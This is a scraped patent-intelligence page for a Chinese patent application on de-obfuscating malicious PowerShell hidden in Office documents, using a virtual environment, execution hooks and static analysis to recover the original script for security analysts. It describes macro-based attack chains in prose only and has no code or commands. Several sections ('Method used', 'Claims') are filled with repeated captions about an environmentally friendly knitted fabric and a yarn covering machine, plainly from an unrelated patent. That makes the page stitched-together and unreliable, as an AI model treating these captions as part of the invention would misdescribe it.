Unlock instant, AI-driven research and patent intelligence for your innovation.

De-obfuscation method based on Powershell script

A de-obfuscation and scripting technology, applied in the security field, can solve problems such as complex obfuscation methods, high false positive rate, inability to automatically obtain Powershell in-depth analysis, etc., to achieve the effect of in-depth analysis

Pending Publication Date: 2021-03-09
ZHONGKE INFORMATION SECURITY COMMON TECH NAT ENG RES CENT CO LTD
View PDF0 Cites 1 Cited by
  • Summary
  • Abstract
  • Description
  • Claims
  • Application Information

AI Technical Summary

Problems solved by technology

[0008] The main shortcomings of the current research methods are: (1) Using the detection of Office macros to replace the detection of malicious Powershell has a very high false positive rate, and normal documents will also use Shell commands to call system functions; (2) Currently, for The extraction of malicious Powershell scripts is still manual analysis. As the number of samples using malicious Powershell increases, the obfuscation methods become more and more complicated. Manual analysis alone cannot meet the requirements; (3) For the obfuscation embedded in documents The Powershell script cannot automatically obtain the original Powershell for in-depth analysis

Method used

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
View more

Image

Smart Image Click on the blue labels to locate them in the text.
Viewing Examples
Smart Image
  • De-obfuscation method based on Powershell script

Examples

Experimental program
Comparison scheme
Effect test

Embodiment Construction

[0024] The following will clearly and completely describe the technical solutions in the embodiments of the present invention with reference to the accompanying drawings in the embodiments of the present invention. Obviously, the described embodiments are only some, not all, embodiments of the present invention. Based on the embodiments of the present invention, all other embodiments obtained by persons of ordinary skill in the art without creative efforts fall within the protection scope of the present invention.

[0025] Such as figure 1 As shown, a Powershell script-based de-obfuscation method includes the following steps:

[0026] Step 1: Preprocess the document, provide a virtual environment for Office documents to run automatically, and minimize macro security;

[0027] Step 2: The first layer of dynamic deobfuscation, using the Hook mechanism to extract the Powershell code from the obfuscated code in the document;

[0028] Step 3: The second layer of static deobfuscat...

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

PUM

No PUM Login to View More

Abstract

The invention provides a de-obfuscation method based on the Powershell script. The method ecomprises the following steps: preprocessing a document, providing a virtual environment for automatic operation of an Office document, and minimizing macro safety; extracting the Powershell code from the code obfuscated in the document by using a Hook mechanism; and obtaining the original Powershell according to the obfuscation characteristics of the malicious Powershell in the document. The method has the beneficial effects that the Powershell embedded in the malicious document can be efficiently and quickly extracted, the original Powershell script is obtained, further deep analysis of safety personnel is facilitated, and a certain contribution is made to traceability evidence obtaining of attacks.

Description

technical field [0001] The invention relates to the field of security technology, in particular to a Powershell script-based de-obfuscation method. Background technique [0002] Due to the rapid development of anti-virus technology, the distribution of executable malicious programs has become more and more difficult, and attackers are increasingly inclined to use tools already present on the target computer to carry out malicious actions, which will leave fewer traces of the attack , making detection more difficult. Since Microsoft Powershell is installed by default on Windows systems, Powershell has become an ideal tool in the attack chain of many attack groups. Malicious Powershell scripts usually play the role of downloaders, and the most common form of use is to bundle Office macros for intrusion [1]. Such as figure 1 As shown, attackers usually trick users into opening Office documents (Word, Excel) through social engineering camouflage methods, and guide users to en...

Claims

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

Application Information

Patent Timeline
no application Login to View More
IPC IPC(8): G06F21/53G06F21/56
CPCG06F21/53G06F21/563G06F21/566
Inventor 胡建勋徐根炜刘元
Owner ZHONGKE INFORMATION SECURITY COMMON TECH NAT ENG RES CENT CO LTD